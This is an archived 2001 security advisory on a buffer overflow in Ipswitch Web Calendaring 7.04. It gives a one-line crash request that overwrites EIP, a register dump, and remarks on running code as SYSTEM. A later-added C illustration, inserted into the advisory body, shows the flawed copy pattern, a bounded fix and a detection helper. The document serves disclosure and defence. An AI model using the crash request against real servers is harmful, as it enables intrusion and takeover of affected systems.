def-2001-29

From: andreas junestam (andreas.junestamat_private)
Date: Fri Oct 12 2001 - 04:04:16 PDT


    ======================================================================
                      Defcom Labs Advisory def-2001-29
    
             Ipswitch Web Calendaring 7.04 Buffer Overflow
    
    Author: Andreas Junestam <andreasat_private>
    Release Date: 2001-10-12
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    When a request sent to the Web Calendar (port 8484) is longer than 97
    bytes, a buffer overflow occurs and EIP is overwritten.
    
    ------------------------=[Affected Systems]=--------------------------
    - Ipswitch Web Calendaring 7.04 and possibly earlier versions
    
    ----------------------=[Detailed Description]=------------------------
    Sending a request like:
    GET /'A' x 96 HTTP/1.0
    
    Generates:
    Access violation - code c0000005 (first chance)
    eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e
    edi=00000000 eip=61616161 esp=016f99fc ebp=61616161
    61616161 ??               ???
    
    This leaves us with the possibility to run code as SYSTEM. Mind though:
    the server does a ToLower on the buffer BEFORE the overflow occurs,
    limiting the number of instructions we can use.
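    The symptom above (a request-target of 97 bytes or more overwriting
    EIP, after the server has lowercased the buffer) is what an unbounded
    lowercase-copy into a fixed-size stack buffer produces. The following
    is an added illustration, not the vendor's code and not part of the
    original advisory: a hypothetical reconstruction of that pattern next
    to a bounded replacement, plus a helper that flags request lines whose
    target reaches the advisory's size so a log reviewer or IDS rule can
    spot probes. The 97-byte buffer size, the function names and the
    constructed "GET /AAA... HTTP/1.0" sample line are all assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size: the advisory reports that a request-target of
 * "/" plus 96 bytes (97 bytes in total) overwrites EIP. */
#define PATH_BUF 97

/* Illustrative vulnerable pattern (hypothetical, NOT the vendor's code):
 * lowercases while copying and stops only at NUL, so any target of
 * PATH_BUF bytes or more runs off the end of a PATH_BUF-sized buffer.
 * Kept here for comparison only; nothing below calls it. */
static void copy_lower_unbounded(char *dst, const char *src) {
    while (*src) {
        *dst++ = (char)tolower((unsigned char)*src++);
    }
    *dst = '\0';
}

/* Bounded replacement: extract the request-target from an HTTP request
 * line ("GET /x HTTP/1.0"), lowercase it into dst, and refuse anything
 * that does not fit (leaving room for the terminating NUL).
 * Returns the target length, -1 on a malformed line, -2 when too long. */
static int extract_path_lower(const char *line, char *dst, size_t dstsz) {
    const char *sp = strchr(line, ' ');
    if (sp == NULL) return -1;
    const char *start = sp + 1;
    const char *end = strchr(start, ' ');
    if (end == NULL) end = start + strlen(start);   /* no version token */
    size_t n = (size_t)(end - start);
    if (n == 0 || n + 1 > dstsz) return -2;
    for (size_t i = 0; i < n; i++) {
        dst[i] = (char)tolower((unsigned char)start[i]);
    }
    dst[n] = '\0';
    return (int)n;
}

/* Build a constructed sample line "GET /AAA...A HTTP/1.0" with n_a 'A's.
 * Returns 0 on success, -1 if it would not fit in out. */
static int build_line(char *out, size_t outsz, size_t n_a) {
    if (5 + n_a + 10 > outsz) return -1;
    memcpy(out, "GET /", 5);
    memset(out + 5, 'A', n_a);
    memcpy(out + 5 + n_a, " HTTP/1.0", 10);   /* 9 chars plus NUL */
    return 0;
}

/* Run a constructed line with n_a 'A's through the bounded copy into a
 * PATH_BUF-sized buffer; returns extract_path_lower's result. */
static int probe(size_t n_a) {
    char line[4096];
    char buf[PATH_BUF];
    if (build_line(line, sizeof line, n_a) != 0) return -3;
    return extract_path_lower(line, buf, sizeof buf);
}

/* Detection helper: does the request-target of this line reach the size
 * reported in the advisory? Parses into a large scratch buffer so the
 * check itself never truncates. 1 = flag it, 0 = normal, -1 = malformed. */
static int looks_like_def_2001_29(const char *line) {
    char tmp[4096];
    int n = extract_path_lower(line, tmp, sizeof tmp);
    if (n < 0) return -1;
    return n >= PATH_BUF;
}

/* Same detection check on a constructed line with n_a 'A's. */
static int detect_probe(size_t n_a) {
    char line[4096];
    if (build_line(line, sizeof line, n_a) != 0) return -1;
    return looks_like_def_2001_29(line);
}

/* Confirms the lowercasing behaviour: "/Index.HTML" becomes "/index.html". */
static int lower_check(void) {
    char buf[PATH_BUF];
    int n = extract_path_lower("GET /Index.HTML HTTP/1.0", buf, sizeof buf);
    return n == 11 && strcmp(buf, "/index.html") == 0;
}

int main(void) {
    printf("95 A's (fits):      %d\n", probe(95));
    printf("96 A's (PoC size):  %d\n", probe(96));
    printf("flag PoC line:      %d\n", detect_probe(96));
    printf("flag short line:    %d\n", detect_probe(10));
    return 0;
}
```

    With PATH_BUF set to 97, the bounded copy accepts a target of up to 96
    bytes and returns -2 for the 97-byte "/" plus 96 'A' target from the
    advisory, while the detection helper flags that same line; the
    unbounded variant is left in only to show the shape of the defect.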
     
    ---------------------------=[Workaround]=-----------------------------
    
    Download the new version from:
    ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe
    
    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the vendor's attention on the 1st of
    October, 2001. A patch has been released.
    
    ======================================================================
                This release was brought to you by Defcom Labs
    
            http://labs.defcom.com             http://www.defcom.com
    ======================================================================
    



    This archive was generated by hypermail 2b30 : Fri Oct 12 2001 - 08:14:34 PDT